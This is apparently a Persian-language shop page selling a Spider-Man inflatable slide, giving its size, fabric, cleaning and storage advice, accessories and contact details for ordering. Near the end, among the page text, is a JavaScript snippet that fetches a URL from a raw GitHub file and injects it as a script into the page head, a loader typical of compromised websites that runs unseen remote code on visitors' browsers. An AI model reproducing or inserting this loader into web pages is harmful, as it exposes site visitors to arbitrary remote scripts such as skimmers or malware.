سرسره بادی مردعنکبوتی
سرسره بادی مردعنکبوتی

سرسره بادی مردعنکبوتی

 • سرسره بادی مردعنکبوتی یک سرسره بزرگ دو سر می باشد این دستگاه فقط در شهر بازی های و پارک های فضای بزرگ دارند قابل استفاده می باشد.

  ابعاد اندازه

  طول قصر بادی بزرگ 12 متر و عرض آن 8.5 متر و ارتفاع این سرسره بادی به 11 متر می رسد که در فضاهایی باز استفاده می شود و وزن کلی این سرسره 560 کیلوگرم می باشد.

  جنس پارچه قصر بادی مردعنکبوتی

  جنس پارچه سرسره بادی مردعنکبوتی از با کیفیت ترین پارچه کره ای است که به صورت یک لایه ضخیم ساخته شده تا در برابر فشار بالای هوا مقاوم باشد. همچنین کیفیت این پارچه به دور از پوسدگی زودرس است.

  نحوه شستشوی و نگهداری

  نگهداری و شستشوی دستگاه های بادی همه مثل هم هستند. باید بدانید که برای شستشوی سرسره بادی مردعنکبوتی فقط و فقط از آب استفاده کنید اگر از مواد شوینده مانند ریکا، وایتکس و … باعث پوسیدگی دستگاه می شود. برای نهگداری نکاتی هستند که باید شما بدانید. به هیچ وجه دستگاه ها را در هوای بارانی و طوفانی دستگاه ها را باد نکید، و هچنیین در صورت که هوای دستگاه رو تخلیه کردید روی آن روکش بکشید. نکته حتما دستگاه را با بند های که روی خود دستگاه هست با میخ های بزرگ به زمین ببندین.

  لوازم جانبی

  سرسره بادی مردعنکبوتی شامل روکش سر میباشد که روی سرسره هست. دستگاه نیاز به یک دمنده هوا ( پمپ باد ) یک نیم دارد که می توانید از هیمن سایت خریداری کنید.

  طرح و رنگ

  طرح سرسره بادی مردعنکبوتی به موجودی انبار و سفارش شما بستگی دارد. همچنین شامل روکش سر است که با توجه به موجودی انبار و کیفیت مناسب برای هر بخش دوخته می شود. چاپ این سرسره بادی به صورت نانو است که رنگ آن در طول زمان از بین نرود. برای کسب اطلاعات بیشتر می توانید با شماره تلفن 09127484573 تماس حاصل نمایید.

  نحوه خرید سرسره بادی مردعنکبوتی

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید قصر بادی مرد عنکبوتی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  همچنین شما می توانید برای مشاهده اطلاعات بیشتر به محصول سرسره بادی مرد عنکبوتی مراجعه نمایید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید